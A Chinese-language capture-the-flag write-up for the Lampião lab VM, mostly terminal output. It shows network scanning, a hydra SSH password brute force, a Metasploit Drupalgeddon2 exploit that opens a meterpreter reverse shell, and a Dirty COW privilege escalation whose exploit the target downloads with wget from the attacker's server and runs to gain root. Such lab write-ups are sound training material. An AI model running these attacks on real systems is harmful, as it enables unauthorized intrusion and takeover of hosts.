2-Lampiao

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:26:ba:69, IPv4: 192.168.3.11
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.3.1     00:50:56:c0:00:08       VMware, Inc.
192.168.3.2     00:50:56:e4:e9:e5       VMware, Inc.
192.168.3.14    00:0c:29:ab:2f:a2       VMware, Inc.
192.168.3.254   00:50:56:e0:91:13       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.043 seconds (125.31 hosts/sec). 4 responded
                                                                                                                                          
┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.3.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-17 06:40 EDT
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 06:41 (0:00:05 remaining)
Nmap scan report for 192.168.3.14
Host is up (0.00072s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA)
|   2048 f3:e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA)
|   256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52 (ECDSA)
|_  256 c6:55:ca:07:37:65:e3:06:c1:d6:5b:77:dc:23:df:cc (ED25519)
80/tcp   open  http?
| fingerprint-strings: 
|   NULL: 
|     _____ _ _ 
|     |_|/ ___ ___ __ _ ___ _ _ 
|     \x20| __/ (_| __ \x20|_| |_ 
|     ___/ __| |___/ ___|__,_|___/__, ( ) 
|     |___/ 
|     ______ _ _ _ 
|     ___(_) | | | |
|     \x20/ _` | / _ / _` | | | |/ _` | |
|_    __,_|__,_|_| |_|
1898/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Lampi\xC3\xA3o
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=10/17%Time=6710E9B8%P=x86_64-pc-linux-gnu%r(
SF:NULL,1179,"\x20_____\x20_\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\|_\x20\x20\x20_\|\x20\|\x20
SF:\(\x20\)\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\n\x20\x20\|\x20\|\x20\|\x20\|_\|/\x20___\x20\x20\x20\x20___\x20
SF:\x20__\x20_\x20___\x20_\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\n\x20\x20\|\x20\|\x20\|\x20__\|\x20/\x20__\|\x20\x20/\x20_\x20\\/\x2
SF:0_`\x20/\x20__\|\x20\|\x20\|\x20\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x
SF:20_\|\x20\|_\|\x20\|_\x20\x20\\__\x20\\\x20\|\x20\x20__/\x20\(_\|\x20\\
SF:__\x20\\\x20\|_\|\x20\|_\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\\___/\x20\\
SF:__\|\x20\|___/\x20\x20\\___\|\\__,_\|___/\\__,\x20\(\x20\)\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20__/\x20\|/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|___/\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\n______\x20_\x20\x20\x20\x20\x20\x20\x20_\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\x20\n\|\x20\x20___\(_\)\x20\x
SF:20\x20\x20\x20\|\x20\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\
SF:|\n\|\x20\|_\x20\x20\x20_\x20\x20\x20\x20__\|\x20\|_\x20\x20\x20_\x20_\
SF:x20__\x20___\x20\x20\x20__\x20_\x20\x20\x20\x20___\x20\x20__\x20_\x20_\
SF:x20\x20\x20_\x20\x20__\x20_\|\x20\|\n\|\x20\x20_\|\x20\|\x20\|\x20\x20/
SF:\x20_`\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x20\\\x20/\x20_`\x20\|\x
SF:20\x20/\x20_\x20\\/\x20_`\x20\|\x20\|\x20\|\x20\|/\x20_`\x20\|\x20\|\n\
SF:|\x20\|\x20\x20\x20\|\x20\|\x20\|\x20\(_\|\x20\|\x20\|_\|\x20\|\x20\|\x
SF:20\|\x20\|\x20\|\x20\|\x20\(_\|\x20\|\x20\|\x20\x20__/\x20\(_\|\x20\|\x
SF:20\|_\|\x20\|\x20\(_\|\x20\|_\|\n\\_\|\x20\x20\x20\|_\|\x20\x20\\__,_\|
SF:\\__,_\|_\|\x20\|_\|");
MAC Address: 00:0C:29:AB:2F:A2 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.72 ms 192.168.3.14

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.10 seconds

访问80端口

访问1898端口

目录扫描

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.3.14:1898
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.3.14_1898/_24-10-17_06-50-44.txt

Target: http://192.168.3.14:1898/

[06:50:44] Starting: 
[06:50:46] 403 -  292B  - /.ht_wsr.txt
[06:50:46] 403 -  295B  - /.htaccess.bak1
[06:50:46] 403 -  295B  - /.htaccess.save
[06:50:46] 403 -  295B  - /.htaccess.orig
[06:50:46] 403 -  295B  - /.htaccess_orig
[06:50:46] 403 -  296B  - /.htaccess_extra
[06:50:46] 403 -  293B  - /.htaccessBAK
[06:50:46] 403 -  293B  - /.htaccessOLD
[06:50:46] 403 -  293B  - /.htaccess_sc
[06:50:46] 403 -  285B  - /.htm
[06:50:46] 403 -  294B  - /.htaccessOLD2
[06:50:46] 403 -  286B  - /.html
[06:50:46] 403 -  291B  - /.htpasswds
[06:50:46] 403 -  292B  - /.httr-oauth
[06:50:46] 403 -  295B  - /.htpasswd_test
[06:50:46] 403 -  297B  - /.htaccess.sample
[06:50:48] 403 -  286B  - /.php3
[06:50:48] 403 -  285B  - /.php
[06:51:00] 403 -    3KB - /authorize.php
[06:51:05] 200 -   32KB - /CHANGELOG.txt
[06:51:07] 200 -  769B  - /COPYRIGHT.txt
[06:51:08] 403 -    7KB - /cron.php
[06:51:13] 301 -  321B  - /includes  ->  http://192.168.3.14:1898/includes/
[06:51:13] 200 -    1KB - /includes/
[06:51:14] 200 -  132KB - /includes/bootstrap.inc
[06:51:14] 404 -    7KB - /index.php/login/
[06:51:14] 200 -    1KB - /install.php
[06:51:14] 200 -  868B  - /INSTALL.mysql.txt
[06:51:14] 200 -  842B  - /INSTALL.pgsql.txt
[06:51:14] 200 -    1KB - /install.php?profile=default
[06:51:15] 200 -    6KB - /INSTALL.txt
[06:51:15] 200 -    7KB - /LICENSE.txt
[06:51:16] 200 -    2KB - /MAINTAINERS.txt
[06:51:17] 301 -  317B  - /misc  ->  http://192.168.3.14:1898/misc/
[06:51:17] 301 -  320B  - /modules  ->  http://192.168.3.14:1898/modules/
[06:51:17] 200 -  844B  - /modules/
[06:51:20] 301 -  321B  - /profiles  ->  http://192.168.3.14:1898/profiles/
[06:51:20] 200 -  271B  - /profiles/minimal/minimal.info
[06:51:20] 200 -  278B  - /profiles/testing/testing.info
[06:51:20] 200 -  743B  - /profiles/standard/standard.info
[06:51:22] 200 -    2KB - /README.txt
[06:51:23] 200 -  744B  - /robots.txt
[06:51:23] 301 -  320B  - /scripts  ->  http://192.168.3.14:1898/scripts/
[06:51:23] 200 -  641B  - /scripts/
[06:51:24] 403 -  294B  - /server-status
[06:51:24] 403 -  295B  - /server-status/
[06:51:26] 301 -  318B  - /sites  ->  http://192.168.3.14:1898/sites/
[06:51:26] 200 -    0B  - /sites/example.sites.php
[06:51:26] 200 -  129B  - /sites/all/libraries/README.txt
[06:51:26] 200 -  431B  - /sites/README.txt
[06:51:26] 200 -  715B  - /sites/all/modules/README.txt
[06:51:26] 200 -  545B  - /sites/all/themes/README.txt
[06:51:29] 301 -  319B  - /themes  ->  http://192.168.3.14:1898/themes/
[06:51:29] 200 -  527B  - /themes/
[06:51:30] 403 -    4KB - /update.php
[06:51:30] 200 -    3KB - /UPGRADE.txt
[06:51:33] 200 -    2KB - /web.config
[06:51:35] 200 -   42B  - /xmlrpc.php

Task Completed
                                                

robots.txt

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html

User-agent: *
Crawl-delay: 10
# CSS, JS, Images
Allow: /misc/*.css$
Allow: /misc/*.css?
Allow: /misc/*.js$
Allow: /misc/*.js?
Allow: /misc/*.gif
Allow: /misc/*.jpg
Allow: /misc/*.jpeg
Allow: /misc/*.png
Allow: /modules/*.css$
Allow: /modules/*.css?
Allow: /modules/*.js$
Allow: /modules/*.js?
Allow: /modules/*.gif
Allow: /modules/*.jpg
Allow: /modules/*.jpeg
Allow: /modules/*.png
Allow: /profiles/*.css$
Allow: /profiles/*.css?
Allow: /profiles/*.js$
Allow: /profiles/*.js?
Allow: /profiles/*.gif
Allow: /profiles/*.jpg
Allow: /profiles/*.jpeg
Allow: /profiles/*.png
Allow: /themes/*.css$
Allow: /themes/*.css?
Allow: /themes/*.js$
Allow: /themes/*.js?
Allow: /themes/*.gif
Allow: /themes/*.jpg
Allow: /themes/*.jpeg
Allow: /themes/*.png
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

CHANGELOG.txt

Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
  https://www.drupal.org/node/2826480).
- Logging of searches can now be disabled (new option in the administrative
  interface).
- Added menu tree render structure to (pre-)process hooks for theme_menu_tree()
  (API addition: https://www.drupal.org/node/2827134).
- Added new function for determining whether an HTTPS request is being served
  (API addition: https://www.drupal.org/node/2824590).
- Fixed incorrect default value for short and medium date formats on the date
  type configuration page.
- File validation error message is now removed after subsequent upload of valid
  file.
- Numerous bug fixes.
- Numerous API documentation improvements.
- Additional performance improvements.
- Additional automated test coverage.

Drupal 7.53, 2016-12-07
-----------------------
- Fixed drag and drop support on newer Chrome/IE 11+ versions after 7.51 update
  when jQuery is updated to 1.7-1.11.0.

Drupal 7.52, 2016-11-16
-----------------------
- Fixed security issues (multiple vulnerabilities). See SA-CORE-2016-005.

Drupal 7.51, 2016-10-05
-----------------------
- The Update module now also checks for updates to a disabled theme that is
  used as an admin theme.
- Exceptions thrown in dblog_watchdog() are now caught and ignored.
- Clarified the warning that appears when modules are missing or have moved.
- Log messages are now XSS filtered on display.
- Draggable tables now work on touch screen devices.
- Added a setting for allowing double underscores in CSS identifiers
  (https://www.drupal.org/node/2810369).
- If a user navigates away from a page while an Ajax request is running they
  will no longer get an error message saying "An Ajax HTTP request terminated
  abnormally".
- The system_region_list() API function now takes an optional third parameter
  which allows region name translations to be skipped when they are not needed
  (API addition: https://www.drupal.org/node/2810365).
- Numerous performance improvements.
- Numerous bug fixes.
- Numerous API documentation improvements.
- Additional automated test coverage.
......

Drupal系统

爬虫爬取相关信息整理成密码本

cewl http://192.168.3.14:1898/?q=node/1 -w 123.txt

访问

http://192.168.3.14:1898/?q=node/2

时发现

audio.m4a：语音获得用户名：tiago
qrc.png：图片二维码扫描获得信息，需要爆破

有了用户名和密码选择hydra爆破ssh

┌──(root㉿kali)-[~]
└─# hydra -l tiago -P 123.txt ssh://192.168.3.14 -I -v

得到密码

Virgulino

ssh登录

┌──(root㉿kali)-[~]
└─# ssh tiago@192.168.3.14  
The authenticity of host '192.168.3.14 (192.168.3.14)' can't be established.
ED25519 key fingerprint is SHA256:GGW0ASyjbhMycAKiglcXcsa0HvSwkLHZP9bQBtVrPs8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.3.14' (ED25519) to the list of known hosts.
tiago@192.168.3.14's password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Thu Oct 17 08:00:57 BRT 2024

  System load:  0.0               Processes:           216
  Usage of /:   7.5% of 19.07GB   Users logged in:     0
  Memory usage: 34%               IP address for eth0: 192.168.3.14
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Fri Apr 20 14:40:55 2018 from 192.168.108.1
tiago@lampiao:~$ 

另外也可以通过漏洞打进去

msf6 > search 2018-7600

Matching Modules
================

   #   Name                                      Disclosure Date  Rank       Check  Description
   -   ----                                      ---------------  ----       -----  -----------
   0   exploit/unix/webapp/drupal_drupalgeddon2  2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   1     \_ target: Automatic (PHP In-Memory)    .                .          .      .
   2     \_ target: Automatic (PHP Dropper)      .                .          .      .
   3     \_ target: Automatic (Unix In-Memory)   .                .          .      .
   4     \_ target: Automatic (Linux Dropper)    .                .          .      .
   5     \_ target: Drupal 7.x (PHP In-Memory)   .                .          .      .
   6     \_ target: Drupal 7.x (PHP Dropper)     .                .          .      .
   7     \_ target: Drupal 7.x (Unix In-Memory)  .                .          .      .
   8     \_ target: Drupal 7.x (Linux Dropper)   .                .          .      .
   9     \_ target: Drupal 8.x (PHP In-Memory)   .                .          .      .
   10    \_ target: Drupal 8.x (PHP Dropper)     .                .          .      .
   11    \_ target: Drupal 8.x (Unix In-Memory)  .                .          .      .
   12    \_ target: Drupal 8.x (Linux Dropper)   .                .          .      .
   13    \_ AKA: SA-CORE-2018-002                .                .          .      .
   14    \_ AKA: Drupalgeddon 2                  .                .          .      .


Interact with a module by name or index. For example info 14, use 14 or use exploit/unix/webapp/drupal_drupalgeddon2

msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > info

       Name: Drupal Drupalgeddon 2 Forms API Property Injection
     Module: exploit/unix/webapp/drupal_drupalgeddon2
   Platform: PHP, Unix, Linux
       Arch: php, cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2018-03-28

Provided by:
  Jasper Mattsson
  a2u
  Nixawk
  FireFart
  wvu <wvu@metasploit.com>

Module stability:
 crash-safe

Available targets:
      Id  Name
      --  ----
  =>  0   Automatic (PHP In-Memory)
      1   Automatic (PHP Dropper)
      2   Automatic (Unix In-Memory)
      3   Automatic (Linux Dropper)
      4   Drupal 7.x (PHP In-Memory)
      5   Drupal 7.x (PHP Dropper)
      6   Drupal 7.x (Unix In-Memory)
      7   Drupal 7.x (Linux Dropper)
      8   Drupal 8.x (PHP In-Memory)
      9   Drupal 8.x (PHP Dropper)
      10  Drupal 8.x (Unix In-Memory)
      11  Drupal 8.x (Linux Dropper)

Check supported:
  Yes

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  DUMP_OUTPUT  false            no        Dump payload command output
  PHP_FUNC     passthru         yes       PHP function to execute
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
                                          oit.html
  RPORT        80               yes       The target port (TCP)
  SSL          false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /                yes       Path to Drupal install
  VHOST                         no        HTTP server virtual host

Payload information:
  Avoid: 3 characters

Description:
  This module exploits a Drupal property injection in the Forms API.

  Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2018-7600
  https://www.drupal.org/sa-core-2018-002
  https://greysec.net/showthread.php?tid=2912
  https://research.checkpoint.com/uncovering-drupalgeddon-2/
  https://github.com/a2u/CVE-2018-7600
  https://github.com/nixawk/labs/issues/19
  https://github.com/FireFart/CVE-2018-7600

Also known as:
  SA-CORE-2018-002
  Drupalgeddon 2


View the full module info with the info -d command.

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
rport => 1898
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.3.14
rhosts => 192.168.3.14
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > info

       Name: Drupal Drupalgeddon 2 Forms API Property Injection
     Module: exploit/unix/webapp/drupal_drupalgeddon2
   Platform: PHP, Unix, Linux
       Arch: php, cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2018-03-28

Provided by:
  Jasper Mattsson
  a2u
  Nixawk
  FireFart
  wvu <wvu@metasploit.com>

Module stability:
 crash-safe

Available targets:
      Id  Name
      --  ----
  =>  0   Automatic (PHP In-Memory)
      1   Automatic (PHP Dropper)
      2   Automatic (Unix In-Memory)
      3   Automatic (Linux Dropper)
      4   Drupal 7.x (PHP In-Memory)
      5   Drupal 7.x (PHP Dropper)
      6   Drupal 7.x (Unix In-Memory)
      7   Drupal 7.x (Linux Dropper)
      8   Drupal 8.x (PHP In-Memory)
      9   Drupal 8.x (PHP Dropper)
      10  Drupal 8.x (Unix In-Memory)
      11  Drupal 8.x (Linux Dropper)

Check supported:
  Yes

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  DUMP_OUTPUT  false            no        Dump payload command output
  PHP_FUNC     passthru         yes       PHP function to execute
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS       192.168.3.14     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
                                          oit.html
  RPORT        1898             yes       The target port (TCP)
  SSL          false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /                yes       Path to Drupal install
  VHOST                         no        HTTP server virtual host

Payload information:
  Avoid: 3 characters

Description:
  This module exploits a Drupal property injection in the Forms API.

  Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2018-7600
  https://www.drupal.org/sa-core-2018-002
  https://greysec.net/showthread.php?tid=2912
  https://research.checkpoint.com/uncovering-drupalgeddon-2/
  https://github.com/a2u/CVE-2018-7600
  https://github.com/nixawk/labs/issues/19
  https://github.com/FireFart/CVE-2018-7600

Also known as:
  SA-CORE-2018-002
  Drupalgeddon 2


View the full module info with the info -d command.

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 192.168.3.11:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 192.168.3.14
[*] Meterpreter session 1 opened (192.168.3.11:4444 -> 192.168.3.14:58080) at 2024-10-17 07:10:10 -0400



meterpreter > dir
Listing: /var/www/html
======================

Mode              Size               Type  Last modified                      Name
----              ----               ----  -------------                      ----
100755/rwxr-xr-x  475800772128957    fil   207442293773-05-16 03:36:21 -0400  CHANGELOG.txt
100755/rwxr-xr-x  6360846566857      fil   207442293773-05-16 03:36:21 -0400  COPYRIGHT.txt
100755/rwxr-xr-x  7374458848949      fil   207442293773-05-16 03:36:21 -0400  INSTALL.mysql.txt
100755/rwxr-xr-x  8048768714578      fil   207442293773-05-16 03:36:21 -0400  INSTALL.pgsql.txt
100755/rwxr-xr-x  5574867551506      fil   207442293773-05-16 03:36:21 -0400  INSTALL.sqlite.txt
100755/rwxr-xr-x  77287936509515     fil   207442293773-05-16 03:36:21 -0400  INSTALL.txt
100755/rwxr-xr-x  77704548337324     fil   207442293773-05-16 03:36:21 -0400  LICENSE.txt
100644/rw-r--r--  14721481446804764  fil   207452918583-06-18 16:34:46 -0400  LuizGonzaga-LampiaoFalou.mp3
100755/rwxr-xr-x  37409165156870     fil   207442293773-05-16 03:36:21 -0400  MAINTAINERS.txt
100755/rwxr-xr-x  23115513992454     fil   207442293773-05-16 03:36:21 -0400  README.txt
100755/rwxr-xr-x  43477953947531     fil   207442293773-05-16 03:36:21 -0400  UPGRADE.txt
100644/rw-r--r--  149099789715355    fil   207452827122-11-09 10:48:22 -0500  audio.m4a
100755/rwxr-xr-x  28363964029388     fil   207442293773-05-16 03:36:21 -0400  authorize.php
100755/rwxr-xr-x  3092376453840      fil   207442293773-05-16 03:36:21 -0400  cron.php
040755/rwxr-xr-x  17592186048512     dir   207442293773-05-16 03:36:21 -0400  includes
100755/rwxr-xr-x  2272037700113      fil   207442293773-05-16 03:36:21 -0400  index.php
100755/rwxr-xr-x  3019362009791      fil   207442293773-05-16 03:36:21 -0400  install.php
100755/rwxr-xr-x  1149900184360404   fil   195804193645-09-25 03:18:20 -0400  lampiao.jpg
040755/rwxr-xr-x  17592186048512     dir   207442293773-05-16 03:36:21 -0400  misc
040755/rwxr-xr-x  17592186048512     dir   207442293773-05-16 03:36:21 -0400  modules
040755/rwxr-xr-x  17592186048512     dir   207442293773-05-16 03:36:21 -0400  profiles
100644/rw-r--r--  41549513631178     fil   207452657131-05-04 17:02:29 -0400  qrc.png
100755/rwxr-xr-x  9401683413133      fil   207442293773-05-16 03:36:21 -0400  robots.txt
040755/rwxr-xr-x  17592186048512     dir   207442293773-05-16 03:36:21 -0400  scripts
040755/rwxr-xr-x  17592186048512     dir   207442293773-05-16 03:36:21 -0400  sites
040755/rwxr-xr-x  17592186048512     dir   207442293773-05-16 03:36:21 -0400  themes
100755/rwxr-xr-x  85839216397842     fil   207442293773-05-16 03:36:21 -0400  update.php
100755/rwxr-xr-x  9448928053400      fil   207442293773-05-16 03:36:21 -0400  web.config
100755/rwxr-xr-x  1791001362849      fil   207442293773-05-16 03:36:21 -0400  xmlrpc.php

meterpreter > shell
Process 3564 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@lampiao:/var/www/html$ 

得到的都是个低权限的

脏牛提权复现以及如何得到一个完全交互的shell - 先知社区 (aliyun.com)

脏牛提权

tiago@lampiao:~$ wget http://192.168.3.11:8082/40847.cpp  
--2024-10-17 09:14:53--  http://192.168.3.11:8082/40847.cpp
Connecting to 192.168.3.11:8082... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10212 (10.0K) [text/x-c++src]
Saving to: ‘40847.cpp’

100%[================================================================================================>] 10,212      --.-K/s   in 0s      

2024-10-17 09:14:53 (150 MB/s) - ‘40847.cpp’ saved [10212/10212]

tiago@lampiao:~$ ls
40847.cpp
tiago@lampiao:~$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o yiyi 40847.cpp -lutil
tiago@lampiao:~$ ls
40847.cpp  dayu
tiago@lampiao:~$ chmod 777 yiyi
tiago@lampiao:~$ ls
40847.cpp  dayu
tiago@lampiao:~$ ./yiyi
Running ...
Received su prompt (Password: )
Root password is:   dirtyCowFun
Enjoy! :-)
tiago@lampiao:~$ 

msf6 > searchsploit -m linux/local/40847.cpp
[*] exec: searchsploit -m linux/local/40847.cpp

  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)
      URL: https://www.exploit-db.com/exploits/40847
     Path: /usr/share/exploitdb/exploits/linux/local/40847.cpp
    Codes: CVE-2016-5195
 Verified: True
File Type: C++ source, ASCII text
Copied to: /root/yiyi/40847.cpp


msf6 > exit

                                                                                                                                         
┌──(root㉿kali)-[~/yiyi]
└─# python -m http.server 8082
Serving HTTP on 0.0.0.0 port 8082 (http://0.0.0.0:8082/) ...
192.168.3.14 - - [17/Oct/2024 08:14:54] "GET /40847.cpp HTTP/1.1" 200 -

直接登录即可

tiago@lampiao:~$ su
Password: 
root@lampiao:/home/tiago# whoami
root
root@lampiao:/home/tiago# ls /root
flag.txt
root@lampiao:/home/tiago# nl /root/flag.txt 
     1  9740616875908d91ddcdaa8aea3af366
root@lampiao:/home/tiago#